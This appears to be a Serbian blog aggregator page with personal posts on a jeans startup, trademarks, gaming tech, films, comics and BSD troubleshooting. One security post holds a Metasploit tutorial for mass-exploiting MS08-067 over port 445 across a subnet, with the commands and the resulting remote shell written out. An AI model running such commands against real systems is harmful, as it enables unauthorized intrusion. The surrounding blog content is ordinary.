Planeta Srbija

Izgleda da sam zaboravio kako izgleda business u offline svetu :) Razmišljao sam o 100 detalja u vezi Geek Jeansa, ali jedan od najbitnijih sam skroz predvideo, zaštita Brenda i dizajna pri proizvodnji ;) Juče sam krenuo da skupljam svu dokumentaciju i da upijam informacije oko svega toga. Iskreno najviše bi voleo da postoji neka CC licenca i za takve stvari, ali stvari su mnogo drugačije nego u online svetu.

Priča je (otkrivam toplu vodu) što se situacije tiče ukratko sledeća. Posebno se zaštićuje Brend, pa logo, pa dizajn za svaki model. Prvo se zaštićuje u zemlji gde vam je business, a kasnije ako želite i internacionalno. Svaka navedena stvar se zaštićuje u više željenih industrijskih klasi (garderoba, prehrana, hemijski proizvodi itd.). Interesantno je da kada idete na internacionalnu zaštitu, za svaku zemlju posebno plaćate kao i za željenu klasu u svakoj zemlji ;)

Neću ulaziti sada u detalje svega ovoga gore navedenog, ali kada se podvuče neka crta i ide sa pretpostavkom da se dobro “obezbedite” štiteći svoj brend i dva Jeans modela recimo, potrebne su vam sume novca od par stotina hiljada evra. I to sve za šta? Pa za to da se vaš proizvod može pronaći na lokalnoj pijaci u sred Pariza bez problema izkopiran gotovo do detalja od nekog kineskog proizvođača pod nekim drugim imenom. Ceo sistem mi jako smrdi…

Na pamet mi padaju gomile pitanja… Zašto bih plaćao nekome uslugu jebeno skupo, a taj istu ne može da mi pruži nego ja kasnije moram da dam još novca advokatima da bi se izborio samo za delić iste?? I to sve dok se ne pojavi neko drugi sa istom idejom o kopiranju…

OK, regovaću brend i logo recimo, za to mi relativno mogu pomoći da se zaštitim. A kako planiram da budem uglavnom online prisutan, a imam i svoje domene već kupljene oko tog businessa tu ne rizikujem gotovo ništa. Ali zašto bih plaćao zaštitu dizajna kada mi ustanova koju plaćam za to i tako ne može garantovati da će me spasiti kopija? Pa Kinezi su iPhone iskopirali do detalja pa još u njemu dodali i brdo opcija kojih nema ni u samom originalu – neki kažu bolji je od originala ima TV u njemu :) Naravno, aparat se ne zove iPhone, niti to jeste, ali oba proizvoda pronalaze svoju publiku.

Šta uopte rizikujem ako ne zaštitim recimo dizajn modela? OK, može bilo ko da ga kopira, ali to ne može da stave pod mojom markom, ne? Što je i Denis rekao, pa i te kopije daju neki šarm.

Rado bih nekako napravio neki jeans model pod CC licencom :)

Btw. odoh sada da zaštitim Brend koji sam juče odabrao, za ovo imam još malo vremena da razmislim..

Uvek imam problem sa kupovinom jeansa. U stanju sam da nosim stare i po par godina jer ne mogu pronaći model koji mi se dopada. Ta priča traje već više decenija sada.

Pre koju sedmicu, bio sam na nekoj večeri gde sam upoznao jednog lika koji se bavi uvozom jeansa iz Kine u Francusku. Tip je celo veče pričao o svom poslu, ali bez smaranja. Čovek jednostavno obožava jeans i sa uživanjem priča o tome – imate utisak da živi za jeans. Posle te večere mi je na pamet pala ideja – hoću da napravim svoj jeans. Da boja bude po mom ukusu, da džepovi budu taman tamo gde trebaju, da kroj pada taman kako ja hoću… Hoću moj Jeans!

Sledeće je bilo, zašto to ne podeliti sa drugima? Znam bar 20tak osoba koje će mi sigurno reći: “hoću i ja jedan takav model”. OK, pravim onda jedan ženski i jedan muški model geek jeansa. Odlučio sam da projekat komercijalizujem i pre neki dan sam krenuo u realizaciju ideje.

Sam početak realizovanja ove ideje sam podelio u više delova. Ako bi ih grubo izdelio, stvari će se dešavati ovako nekako..

Među prvim koracima je pronaći ime. Za to će mi biti potrebna vaša pomoć – tražim ime za brend. Ko god ime neku ideju i želi da pomogne molim da pošalje predlog na pedja [at] blogowski.eu. Ime koje mi se svidi i budem izabrao, nagrađujem sa jednim iPod shuffle od 2GB. Na pobedniku će biti samo da odabere boju ;)

Pažnja!! Ima samo par uslova: prvo da predlog za ime brenda ima i slobodan .com domen. To znači ako predložite brend blabla recimo, domen Blabla.com mora biti slobodno. Ukoliko ne znate gde se to proverava evo jednog sajta za tako nešto. Pored web domena, predlog za ime brenda mora da je slobodno i na twitteru. Na primeru Blabla znači da twitter.com/blabla ne sme da postoji.

Smernice za ime brenda Geek Jeansa: targetirani korisnici su pre svega sa anglo-saksonskog tržišta koji pored što imaju simpatije za Geek kulturu imaju i iPhone ;) Internet im ima važnost u životu podjednako kao i struja ili voda. Vole Twitter, blogovi su ima mainstream, uglavnom ne gledaju TV nego Vimeo, YouTube, DallyMotion… Ukratko, žive u Real Time Webu ;)

Drugi korak u projektu će biti dizajn modela. Postojaće jedan muški i jedan ženski model kako sam i rekao gore. Oba modela će raditi fashion dizajner koga trenutno tražim. Već imam kontakt sa dva kandidata i tokom januara meseca se nadam da ću odabrati onoga ko će to raditi i kreće se u dizajn. Jeans će morati da ima komforan džep za iPhone i da se pre svega dopada meni i Sanji (muški – ženski model). Za sada znamo da će model biti urađen od kvalitetnog materijala, dosta jednostavan i biće od tamnijeg jeansa. Svake godine će izlaziti drugačiji model, ja nosim farmerice otprilike godinu dana, sigurno ću zaželeti novi model posle toga ;)

Proizvodnja će biti u Srbiji ili Hrvatskoj. Trenutno se hvataju prvi kontakti i za nekih mesec dana će krenuti obilasak prvih fabrika. Planiram da prva serija (sezona) jeansa bude proizvedena u ~500-700 primeraka. Sve ostale detalje oko toga ćemo videti kasnije ;)

Prodaja će biti eksluzivno online. Postojaće early bird period sa manjom cenom i sa ograničenim količinama. Target je na iPhone korisnike iz zapadne Evrope i USA (u početku).

Komunikacija i marketing će se obavljati isključivo preko društvenih medija. Jednom kada bude odabrano ime za brend i kupljen domen, biće otvoren web sajt, blog, twitter i facebook nalog. Komunikacija će u početku (sezona 1) ići primarno na engleskom jeziku uz malo “dobacivanje” na francuskom ;)

Obavljaće se uglavnom na blogu putem pisane i video forme. Video zapisi će prikazivati ceo proces businessa tj. transparentnost će biti prisutna koliko god se to može, a da se ne ugrozi poslovanje. Od dizajniranja modela (tek kada je zaštićen), pravljenja prototipa, slanja u proizvodnju, distribucije kao i svih anegdota koje će pratiti Sanju, mene kao i celu ekipu koja će biti u ovoj avanturi…

p.s Molim vas da predloge za brend Geek Jeansa šaljete isključivo na mailpedja [at] blogowski.eu i ne stavljate ih u komentare. Kao što sam naveo, za predlog mora biti slobodan domen .com. Bilo bi glupo da ga neki pametnjaković kupi ;)

Taman kad pomisliš da si sve video u životu i kako tehnologija nema toliko prostora da napreduje, naiđe neki Indijac i pomuti ti poglede na svet, učinivši da nestrpljivo očekuješ da nešto dođe do šire javnosti. Takav je bio project Natal, a kod Žane sam iskopao novu zvezdu Pranava Mistry i njegovu Sixth Sense tehnologiju. Ameri imaju lep izraz za ovakav tip reakcije - jawdrop!

I’ve been pretty quiet lately, I know. This either means that I have a lot of work or that I’m tired of writing anything for the masses. It’s the first thing. In order to follow my usual ranting on security please start following me on Twitter and Floss.Pro. I’ll be writting less and less short posts about geeky stuff here. I decided to move those few liner posts to my microblogging profiles and to write social engineering/hacking texts here. So, no more translations here. Rants and thoughts will be moved to those two locations and this blog will have more of the texts you seem to like a lot - FB hacking (:P), social engineering, NLP etc. See you on Tweeter and FlossPro.

I just read that Theo de Raadt released new song for the upcomming OpenBSD 4.6 called "Planet of the Users". And I must say I like it. These release songs have been so much fun in the past and together with the artwork for each release make OpenBSD even more fun. You may download new song here. And check out the lyrics here.  

Dear fellow sysadmins, happy System Administrator Appreciation Day! May your servers have high uptime, may your network cables not  look as a bowl of spagetti and may your backups not fail you.http://www.sysadminday.com/ The rest of you: buy your sysadmin a beer today. ;)

Weekend… finally! I haven’t been able to post anything interesting since the week behind us was so… well, a lot of things happened at work. I became a project manager (PM) at MySkin. I’m still working as security consultant it’s just now I have to work with the whole team to push our project forward. Fun never stops! In the meantime new FreeBSD beta was released. I haven’t been reading mailing lists to carefully thus I missed that 8.0 has became BETA. I’m downloading USB stick image - thank you for this FreeBSD team! I just have to put this new baby on my other laptop and test it. Oh, and Facebook related commets are going straight to /dev/null from now on. Sorry people but you say/ask so dumb stuff I just can’t afford to fill my blog’s DB with that crap. Chill out a bit. Go out. Have a drink.

I’m not kind of a person that ever regrets about the things done in the past. What is done is done. Yet, I’m rethinking was it really smart writing about Facebook on my blog. A little bit of history for my visitors from abroad - a few months ago I wrote a few articles explaining how to access other peoples galleries without being their friend. There was a bug in Facebook system that allowed this. It’s not working any more or at least not as simple as it used to. Galleries now have longer ID’s and it’s a lot of work to hack through this. So, what was intended as a proof of concept and a try to show how social networks are very insecure became a horror story. Those two articles were swamped with so silly comments I couldn’t have believed my eyes. I’ve delete a lot of them. To sum them up into two comments: 1. This does not work/I don’t know how to do this. My comment: Oh really! Well, dough! FB fixed the bug and I wrote about it too. And even if they didn’t isn’t it more than obvious how to do it? No? Go back to playing cards on your ‘puter. 2. I want to get other people’s passwords. Will someone teach me to hack? My comment: Get a life! What, you don’t trust your girlfriend/boyfriend so you want to spy their account to see if they are messing in virtual world with someone else… cause you are doing that anyway? Well, here’s a tip: if you know your "beloved" you probbably know her/his password. People use dumb passwords they can remember. And believe me, it’s not that hard to brute force into someone’s FB account. Internet has started to expand in Serbia like a flood in the past few years. And that’s all nice and sweet but… people using global network in Serbia got no clue how to behave. They keep letting complete strangers into their lives by sharing tons of private data. So, what makes you think they use their brains to create passwords? If they had been using their brains at first place they wouldn’t be acting like idiots online. So, to sum up this story - stop asking silly questions like "teach me to hack". What does that mean? I’m sorry (well not actually but I’m being polite) if this text comes to harsh on people… they deserve it. Will it change anything? Nope. Was my intention to be a digital messiah that will show the people their faults? Nope, couldn’t care less. So why did I write this rant? Cause I can. It was just to pass the time while writing an article on encrypted chatting over Jabber and Gtalk. Now that is useful. Will be online by tomorrow.

Poklonu se u zube ne gleda ;)

© Rob Cottingham | Svakodnevnica blog, 2009. | Permalink | Nema komentara | Dodaj u del.icio.us zbirku Tekst označen ključnim rečima: Geek, trojanci

Takođe nepropustite IT vesti i dešavanja na Personal magazinu

Prosto mi je neverovatno da je uz sav buzz oko Google Wave i Bing-a, projekat Natal ostao u drugom planu, i da sam jedino neki info o celom konceptu mogao da nadjem na Tržišnom rešenju, i ako je možda sam koncept daleko smeliji i revolucionarniji nego gornja dva i prža nam mogućnosti, o kojima smo doslovce samo mogli da sanjamo.

Projekat Natal nam donosi revoluciju u interakciji čoveka i računara, zanemarujući sve kontrolne alatke poput tastatura, miševa, džojstika i stavljajući čoveka i njegove karakteristike u prvi plan (glas, lice, pokrete). Kao osnova, za sada koristi se X-Box platforma, i to je sve što ću vam reći o ovom konceptu. Razlog je u tome što je neke stvari zaista potrebno videti da biste shvatili koliko su supercool. Mislim da je WII dobio jaako ozbiljnu konkurenciju…

A ako vas ovo nije oborilo sa stolice, vreme je da upoznate Majloa…

Samo se nadam da neće dolaziti do Ante i Darinka situacije

Update: Branko je na jednom mestu opisao još nekoliko koncepata koji će promeniti izgled igranja na konzolama. Pročitajte i to…

Dosta dugo nisam pisao ništa na srpskom. Za to su najviše odgovorni nebulozni komentari vezani za tekstove koje sam pisao o Facebooku. Ne, neću vas naučiti kako da kradete lozinke… niko vas to neće naučiti. Dođavola. Elem, reših da malo piskaram na srpskom i da dotaknem neke domaće teme. (eng. speaking visitors… proceed, nothing to see… internal Serbian stuff…) Već neko vreme mi se motaju po glavi neki tekstovi. No, ono što bih danas voleo da pitam sve prisutne jeste: šta mislite o poverenju? Da se pojasnim. Većini vas je poznat termin "cloud computing". Do sada su valjda i zidovi naučili da tako nešto postoji. No, pretpostavljam da većina vas pojma nema šta je to. Svi o tome pričaju. To je u trendu i totalno IN. Kao i jedno milion stvari u poslednjih 10 godina. Opustite se, proći će. Sve je to od ovog sveta. Dakle, kompjuteri u oblacima, kako volim da kažem, jeste nešto tako matoro da pričati o revolucionarnom tehnološkom rešenju jeste u najmanju ruku smešno. Zašto? CC, kako ću dalje zvati ovaj hit, je ništa drugo nego modernizovana verzija "time sharing" sistema iz šezdesetih. Stari model deljenog procesorskog vremena je bio popularan jer su računari u to vreme bili jako skupi. Kasnije je otišao u istoriju kada su personalni računari postali popularni i jeftini. Dakle, svi danas govore o CC. Svi koriste CC. Nema tu ničeg lošeg. Svi koriste Facebook, svi koriste Twitter i ko zna šta još ne. A šta je sa bezbednošću? Ne, neću paranoisati opet. Ovo nas vraća na ono moje pitanje od ranije. Šta mislite o poverenju? Shvatimo, koliko god se bilo kod od nas trudio da ima bezbedan računar uvek će postojati neka rupa. Faktički, kompletan naš svakodnevni digitalni život počiva na poverenju koje poklanjamo nekoma. Da li je to proizvođač hardvera, firma koja je proizvela operativni sistem koji koristite ili naš Internet provajder… sve se svodi na isto. Zbog prvih možemo da izugibimo podatke, drugi mogu da budu krivi što su nas napali virusi ili nam je neko ukrao podatke, a treći mogu da prate šta radimo i da te informacije daju na upotrebu nekom trećem licu. Dakle, svakog dana mi verujemo nekome. Za ove prve baš i nemamo rešenje sem da redovno radimo backup… a opet, tu je i proizvođač medija koji koristimo za čuvanje tih podataka. Za ove druge imamo rešenje… možemo da koristimo nešto bezbednije. Za ove treće… ima rešenja i za to, napisaću možda kasnije kako njih da zaobiđete. No, sve u svemu poverenje je ključna reč. Dobro, a sada se vratimo na CC. Dakle, šta je ovde drugačije od bilo čega do sada. Bilo koja firma koja pruža CC usluge je samo još jedan faktor u svakodnevnoj igri poverenja. Umesto da sami brinemo o bezbednosti sistema koji koristimo mi prepuštamo tu brigu nekome tamo. I to je nešto sa čime moramo da živimo, zar ne? I onda, da se po poslednji put vratim na pitanje - šta mislite o poverenju? Mislim da danas skoro svako ima sajt ili dva. Hosting je posao u cvatu u Srbiji… a ja sam vrlo srećan što sam na vreme pobegao sa te livade… dok još nije potpuno procvetala. Dakle, kakvi su vaši utisci kada je u pitanju poverenje koje morate da imate u odnosu sa svojim provajderima različitih usluga na Internetu? Kakve garantije domaći provajderi nude da nećete preko noći ostati bez svojih podataka? Da li ste potpisali ugovore sa njima ili ste samo po navici kliknuli na "Slažem se" u online formularu (dok ste bili oduševljeni kako je procedura kupovine brza i sjajna)? Danas je vrlo kišan dan i eto došlo mi da malo mračim.

O wow efektu sam često pričao jer sam i sam najveći zavisnik od istog. Znate onaj osećaj kad Vas pukne sreća jer ste doživeli nešto neočekivano, drugačije, totalno cool što vas tera da sledećih 5 dana pričate konstantno o tome, postavši verovatno objekat za izbegavanje od strane bližeg društva, ali to vam ni najmanje ne smanjuje doživljaj.

Photo credit: Mark Storey

Nisam poznat baš kao veliki fan Star Wars/Star Trek serijala, jer sam nekako iste preskočio u detinjstvu a kasnije me snašlo već mnogo čega drugog tako da se moja persona zadovoljavala Matrixom, kao ultimativnom zajedničkom temom svih geekova. I sad kad se pojavio novi Star Trek, verovatno isti ne bi primetio da Sylar iz Heroja, nije u ulozi Spocka, i da se u međuvremenu nisam postao ovisnik o seriji Big Bang Theory, koja između svih geek relikvija Star Trek ističe kao jednu od najbitnijih. Mislim da nikad neću zaboraviti scenu kada Penny poklanja salvetu sa potpisom Leonarda Nimoya, prvobitnog Spocka, Sheldonu i kada ovaj duboko u sebi gaji nadu da ce na osnovu DNK koji nađe na maramici uspeti da klonira najpoznatijeg učesnika Star Trek serijala na planeti. Inače od kako je krenuo film, Twitter je dosta poludeo kada je Star Trek tag u pitanju, gde je film dobio dosta pozitivnih komentara, pa posle svega toga kako jedan geek poput mene da se ne prikloni pokretu

Obzirom da sam, sa svojom standardnom movie ekipom prošli film gledao u Steru (Watchmen, ocena 4/10) ovog puta je red došao na Kolosej, obzirom da je novootvoren i kao ajd da promenimo. Ovo je, ispostaviće se, glavni krivac WOW efekta Kolosej je definitivno najbolji bioskop u kome sam do sada bio. Platno je znatno veće nego u Steru recimo, a zvuk je, blago rečeno preedobar. U pojedinim scenama filma, poput recimo tuče u klubu, ili scene u kojoj neko čudno stvorenje juri JTK-a imate osećaj kao da ste zaista prisutni u sceni, što je možda cool kada su neke ljubavne scene u pitanju ali verujem da bi mi srce stalo na pola filma da je neki horor u pitanju. Od sada, kada je gledanje filmova u Beogradu u pitanju, Kolosej je jedini izbor!

Sam film je audio vizuelni spektakl, iza kog dosta lepo upakovanom pričom (iza filma stoji JJ Abrams koji je zaslužan za serijal Lost), koja se vraća u same početke Star Treka, detinjstva i rane godine glavnih aktera Jamesa Tiberiusa Kirka i Spocka, i objašnjava kako se oformljava čuvena posada Enterprajza. Glavne zamerke na film, došle su upravo od stare Star Trek zajednice, koja je možda izneverena činjenicom da je Vulkan uništen, ili uvođenjem nekih novih koncepata poput alternativne realnosti, ali i pored toga film zaista ima odlične kritike. Ne otkrivam previše, ipak morate da odete u bioskop da biste doživeli film, kako neke stvari zaista nije lako prepričati, imate zaista najtopliju preporuku od mene, koji ću sigurno još jednom pogledati film

Dif-tor heh smusma ili jasnije svima Live long and prosper!

Branko se potrudio da jedan od zidova našeg stana bude obogaćen post-it artom. U pitanju je RSS ikona, a razlog je što mu je to prvi rad ovog tipa a i kod nas je relativno ograničen izbor boja ovih samolepivih papirića, pa je iskoristio za početak činjenicu da je zid narandžast da kreira svoj masterpiece.

Za one koji ne znaju post-it art je kreiranje slika uz pomoć samolepivih blokčića poznatijih kao stikeri ili post-itovi, i bazira se na pixel artu, kreiranju sličica uz pomoć tačaka, karakterističnom za video igrice sa svima popularnih konzola tokom 80tih i početkom 90tih. Odlične primere ovog, pomalo geeky, umetničkog pravca pogledajte ovde, ovde, ovde i ovde.

Moj favorit je definitivno SuperMario na više nivoa ( a kad smo već kod SM pogledajte i footer Draganovog bloga).

Nekada davno, u vremena skoro zaboravljena, kada bi neko hteo da ozbiljno ugrozi neki sistem na Mreži morao bi sam da nađe propust i da napiše eksploit za isti. Za one manje upućene, eksploit je skripta ili program koji napada poznati propust u nekom programu. Pretpostavimo da naša žrtva na svom serveru ima, recimo, FTP server verzije 1.2.3. Ta verzija je zastarela i svi već znaju da se u njoj nalazi propust koji omogućava manje ili više zlonamernim napadačima da uđu na sistem bez pravile provere lozinke. Da bi to zaista radilo potrebno je uspostaviti vezu sa FTP serverom i poslati mu neke komande od kojih će ovaj dobiti epileptični napad i otvoriti vam svoje dveri. Eksploit je programičić koji radi baš to. Prisan je za specifičan progam i, obično, specifičnu verziju tog programa. Sve što radi kada se pokrene jeste izvršavanje malicioznog koda. Dakle, u skoro zaboravljena davna vremena, mlađani haker je morao sam da napiše eksploit. Morao je zapravo da upotrebi mozak kako bi dobio pristup sistemu. Danas… hmm… danas su stvari drugačije. Voleo bih da vas upoznam sa Metasploit projektom. U pitanju je fenomenalan sistem za pisanje eksploita svih vrsta koji u sebi donosi fenomenalnu biblioteku već postojećih eksploita. Kao što naslov kaže - Point. Click. Root. Izaberete žrtvu, kliknete na eksploit koji vas zanima i… dobijete root. Dobro, nije baš tako jednostavno ali se svodi na to. Posebno kada znamo da dobar deo sistema na Internetu čine ne baš ažurirani serveri. "Neće niko nas" je sjajna logika za sigurno uništenje.Šta je zapravo Metasploit? Jedna od mojih omiljenih alatki. Pošto mi je deo posla i tzv. Penetration testiranje Metasploit je jedna od alatki bez koje bi mi posao bio daleko komplikovaniji. Što ne znači da već nije. Dakle, Metasploit je program pisan u Ruby programskom jeziku a sadrži komponente pisane u C i ASM-u. Njegova osnovna svrha je da programerima donese razvojno okruženje za pisanje eksploita i drugih bezbednosnih alatki. Njegov osnovi sistem podrazumeva postojeću biblioteku eksploita koje je moguće konfigurisati po potrebi. Potom se eoksploit izvršava na ciljani server. Ukoliko se sve završi uspešno korisnik dobija pristup sistemu koji je napao. Primer: Upešno izveden napad na VNC server koji se nalazi na Windows 2000 serveru.A sada tema dana - masovna eksploatacija za idiote Ne znam zašto ali kada god vidim neki od naslova "… for dummies" to prevedem kao "… za idiote". Najnovija verzija Metasploita 3.2 donosi jednu sjajnu novinu. Zamislite da se nalazite u situaciji kada treba napasti veći broj sistema. Da, znam… naporno je kliktati i napadati jedan po jedan. Težak je hakerski posao. E pa dragi moji hakeri, novi Metasploit donosi rešenje za bol u vašem zglobu. Mogućnost istovremenog napada većeg broja sistema. Kao primer će nam poslužiti izvršavanje eksploita MS08-067 na port 445 koji je otvoren na većem broju hostova koji se pak nalaze u  C klasi adresa. Za početak pokrenite msfconsole na svojoj BSD ili GNU/Linux mašini. Potrebni su vam SQLite3 gem za Ruby kao i novija verzija Nmap skenera. Kada se Metasploit (msf) komandna linija pojavi učitajte sqlite3 drajver:msf > load db_sqlite3 [*] Successfully loaded plugin: db_sqlite3Zatim ćemo upotrebiti db_create komandu za pokretanje nove SQLite3 baze podataka i povezivanje iste na Metasploit sistem: msf > db_create [*] The specified database already exists, connecting [*] Successfully connected to the database [*] File: /root/.msf3/sqlite3.db Kako bismo ubrzali testiranje upotrebićemo db_nmap komandu sa veoma ograničenim nizom komandi. Cilj nam je da nađemo sve mašine kojima ja otvoren port 445 na ciljanoj podmreži:msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24 Konačno, pokrećemo db_autopwn komandu sa -e opcijom za eksploataciju, -p opcijom da odredimo ciljani port, -b opcijom za dobijanje shell-a i -m opcijom za pokretanje svih modula sa "ms08_067" stringom u svom imenu:msf > db_autopwn -e -p -b -m ms08_067 Kada se ova komanda izvrši možemo izlistati sve aktivne veze koje smo uspeli da ostvarimo:msf > sessions -l Active sessions =============== Id Description Tunnel – ———– —— 1 Command shell AAA.BBB.CCC.11 -> AAA.BBB.CCC.86 Upotrebimo session -i SID kako bismo se povezali na ciljani sistem: msf > sessions -i 1 [*] Starting interaction with 1… Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.C:\WINDOWS\system32> Voila! Nekada davno je sve ovo bilo zapravo zabavno. A sada…

Nova adresa sajta. Kao što sam u prethodnom tekstu naveo, doneo sam odluku da promenim adresu sajta. Obrazložio sam i zašto. Sada je vreme da se vratim pisanju. Čekao sam nekoliko dana kako bi se RSS linkovi na nekim planetoidima ažurirali. Koliko sam uspeo da vidim promena je urađena tako da se sada mogu vratiti bitnim stvarima… paranoisanju. Uzgred, pre dva dana je bio jako važan dan. Sem što je bio petak 13. baš tog dana je UNIX vreme iznosilo 1234567890. Toliko je prošlo od 1.1.1970. Lepa godišnjica. Ah, da. Na kioscima se u četvrtak pojavio i novi broj Dilana Doga. Odlična epizoda - "Dva života Drim". Verujem da će epizoda posebno biti interesantna fanovima koji vole Sklavijeve priče o paklu. A sada… nazad na paranoisanje.

I’m actually not killing the blog itself. Nor will I delete all the content. You see, I actually never planned to run a blog on this domain at first place. Long time ago, when I bought eccegeek.info, I had an idea to have just one page with my CV and that’s it. Then came bloga era. I’ve been thinking to change the domain for my blog for quite some time now. I just couldn’t find the right one. And the name is perhaps the most important thing for online presence. People like nice domain names they can remember without writing it down. I’ve been having quite some problems with my current domain. Is it with two "c"? No, wait. Two "e"? I play with security. I work with security. Security has became my preocupation. And when I say security I mean everything from server and network security to, what I find most interesting, human as a security risk. Human rights online, freedom of speech, free software… all very tightly connected with various aspects of security. So, before I reveal the new name for my website let me quote you a little story from our dear Wikipedia:"The Securitate (Romanian for Security; official full name Departamentul Securităţii Statului, State Security Department), was the secret service of Communist Romania. Previously the Romanian secret police was called Siguranţa statului (State Safety). Founded on August 30, 1948, with help from the SovietNKVD, the Securitate was abolished in December 1989, shortly after PresidentNicolae Ceauşescu was ousted.

The Securitate was, in proportion to Romania’s population, one of the largest and most brutal secret police forces in the Eastern bloc.[1] The first budget of the Securitate in 1948 stipulated a number of 4,641 positions, of which 3,549 were filled by February 1949. By 1951, the Securitate’s staff had increased fivefold, while in January 1956, the Securitate had 25,468 employees.[2] Under the regime of Nicolae Ceauşescu, the Securitate employed some 11,000 agents and a half-million informers.[1] (By way of comparison, as of September 2001, the CIA numbered about 18,000 employees.[3])" –> http://en.wikipedia.org/wiki/Securitate

Have you guessed by now? Yeah. I’ve bought myself so damn cool domain - sekuritatea.com :))) In two days period rehash.eccegeek.info will be out of service.. it’ll just redirect to www.sekuritatea.com. So, update your bookmarks and RSS readers on Thursday. I’ve got a lot of good stuff cooking for this "new" web site.:)

I’m actually not killing the blog itself. Nor will I delete all the content. You see, I actually never planned to run a blog on this domain at first place. Long time ago, when I bought eccegeek.info, I had an idea to have just one page with my CV and that’s it. Then came bloga era. I’ve been thinking to change the domain for my blog for quite some time now. I just couldn’t find the right one. And the name is perhaps the most important thing for online presence. People like nice domain names they can remember without writing it down. I’ve been having quite some problems with my current domain. Is it with two "c"? No, wait. Two "e"? I play with security. I work with security. Security has became my preocupation. And when I say security I mean everything from server and network security to, what I find most interesting, human as a security risk. Human rights online, freedom of speech, free software… all very tightly connected with various aspects of security. So, before I reveal the new name for my website let me quote you a little story from our dear Wikipedia:"The Securitate (Romanian for Security; official full name Departamentul Securităţii Statului, State Security Department), was the secret service of Communist Romania. Previously the Romanian secret police was called Siguranţa statului (State Safety). Founded on August 30, 1948, with help from the SovietNKVD, the Securitate was abolished in December 1989, shortly after PresidentNicolae Ceauşescu was ousted.

The Securitate was, in proportion to Romania’s population, one of the largest and most brutal secret police forces in the Eastern bloc.[1] The first budget of the Securitate in 1948 stipulated a number of 4,641 positions, of which 3,549 were filled by February 1949. By 1951, the Securitate’s staff had increased fivefold, while in January 1956, the Securitate had 25,468 employees.[2] Under the regime of Nicolae Ceauşescu, the Securitate employed some 11,000 agents and a half-million informers.[1] (By way of comparison, as of September 2001, the CIA numbered about 18,000 employees.[3])" –> http://en.wikipedia.org/wiki/Securitate

Have you guessed by now? Yeah. I’ve bought myself so damn cool domain - sekuritatea.com :))) In two days period rehash.eccegeek.info will be out of service.. it’ll just redirect to www.sekuritatea.com. So, update your bookmarks and RSS readers on Thursday. I’ve got a lot of good stuff cooking for this "new" web site.:)

Each morning at the office starts with a cup of coffee, right? Wrong. I don’t drink coffee. So, each mornin at the office (no matter which one) starts with daily dosis of good old web comic humor. I have a list of my fav comics I really do enjoy reading. By now you ought to have realized I really do love comics. Printed ones I really love for various reasons. On the other hand there are short comics released on the web almost each morning. I’ve noticed that a lot of my friends read almost the same comics I do. So, I decided to share my list of favorite ones and to see what do visitors of my blog read. I’d really like to see if I’m missing any good comic out there. So let’s start.No 1. WulffMorgenthaler- drawn by Mikael Wulff and Anders Morgenthaler - http://wulffmorgenthaler.com/ This is my absolute favorite one. I really can’t remember how I’ve found it but ever since my discovermy each morning starts with a really good laughter. This one picture comick is by all means the best and sometimes the sickes thing I’ve ever read. The dosage of humor these guys put into just one picture is amazing. I’ve spent a lot of time reading all their comics from issue No 1. back in 2003. Just some times it feels as if they didn’t have too much inspiration. That happened only once or twice up to now. So, what do they write about? Who to they mock? Everything and everybody. Not once have I seen some really biased comick. They simply make fun of everyone. NOTE: Humor they express in their comics is not for every man’s stomach. Be very careful when you enter their web site cause you never know if it is the day they’ll hurt your feelings.No 2. Explosm - Cyanide & Happiness - http://www.explosm.net My second choice would be Explosm. In some occasions even more bizarre & cruel than my previous choice. Guys who draw this comic really do mess with everything. Nothing is sacred and no one is spared. Their characters are roughly drawn yet they hit the point. They go one step further in insulting everyone and even their readers. You’ll be really surprised with the message you get when you enter the page and the new comic is not yet released.No 3. Dilbert by Scot Adams - http://www.dilbert.com/strips/ My third choice as a guy from "the business" will most definitely be Dilbert. Extremely intelligent and demanding comic for understanding. Scot is putting his finger in the eyes of all the big corporations out there. And even to small ones. Through the adventures of Dilber we see our own lives in big companies.The rest These are not the only comics I read. Yet, these are daily ones. I would also like to mention the following:http://questionablecontent.net/ - Questionable Content - A really interesting daily comic. I’d suggest you read allof them from day 1 so as to catch up with the story. It might seem boring when you don’t really know what and why is happening. http://www.xkcd.com/ - XKCD - Probably the geekiest web comic of all the times. So, what do you like to read?

Latest Dylan Dog has hit the street. The original 222. La Saggezza Dei Morti was published as number 13. in Serbia under the name Mudrost Mrtvaca. Dylan Dog is once again facing his old friends zombies. This episode in particular should be very interesting to all fans of E.A.Poe and his The Fall of the House of Usher. Why? Run to the nearest news stand and pick your copy of the latest Dylan Dog. Or you’ll miss one hell of an episode.

I’ve been having issues with FreeBSD 7.x and Intel graphic card on my laptop. Well, at first I didn’t blame XOrg nor graphic card. The issue was following: for no apparent reason my system would freeze now and then. I could not repeat the crash and logs didn’t say much. The only thing dmesg gave me were some gnome-keyring-daemon errors. So I blamed GNOME. I’ve deinstalled everything that needed gnome-keyring and moved to XFCE4 or E17. It worked OK for some time and then it started again. And then I found this: http://forums.freebsd.org/showthread.php?t=1345&highlight=Xorg In the meanting I had a chat on an IRC channel with a fellow who’s having similar issues with his laptop. We figured out that Intel and FreeBSD’s DRM aren’t really working well together. Too bad. So, the only solution would be to disable DRI, DRM and so on… I’ve disabled GLX, DRI and GL. It seems to be working OK for now. Thou, I think I’ll be going back to my dear OpenBSD this weekend.

It’s been almost 40 days since I’ve written anything on this blog. I’ve started considering the idea to delete the damn thing. I didn’t really have time to post anything useful all this time. Not that I didn’t have anything to say or that I didn’t feel like writing anything… it’s just. Well, my old job was killing my free time. Almost all of my FOSS work suffered cause of that. Things have changed.

Ако сте geek са ових простора, или нисте баш толико „залуђени“ али вам недостаје нешто приче о слободном софтверу и ГНУ филозофији уопште, можда је ово један од ваших веселих дана… или можда да кажем вечери? Пази сад ‘вамо, тиче се GNUzilla магазина… Нова GNUzilla 38 (јануар 2009) на 45 страна угледала је светлост новогодишњих звезда!

…из пера главног уредника (широј јавности познатог као Иван Јелић):

ОДРЖАВАЊЕ ЖИВОТА НА АПАРАТИМА ЈЕ ВРЕДЕЛО, ШТО НЕ ЗНАЧИ ДА СМО ИХ УГАСИЛИ.

Без обзира на то што је новогодишњи, овај број је још један у низу специфичних. Довољно је каснио да су вероватно сви већ дигли руке од њега, али је опет довољно редован да се не заборави на ГНУзилу. Докле ћемо тако видећемо, то је све што сада можемо рећи, сви заједно.

